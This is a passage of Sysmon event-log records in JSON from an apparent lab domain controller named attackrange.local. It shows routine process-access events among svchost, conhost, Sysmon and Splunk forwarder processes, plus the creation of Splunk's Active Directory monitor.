C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5767,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5768,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5769,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5770,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5771,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5772,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.159\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-036E-5F25-0000-00105ADB0A00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.159","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-036E-5F25-0000-00105ADB0A00}","TargetProcessId":"4848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5773,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nProcessGuid: {A837DB8D-036E-5F25-0000-001017DD0A00}\r\nProcessId: 5028\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","ProcessGuid":"{A837DB8D-036E-5F25-0000-001017DD0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5774,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-036E-5F25-0000-001017DD0A00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-036E-5F25-0000-001017DD0A00}","TargetProcessId":"5028","TargetImage":"C:\\Program 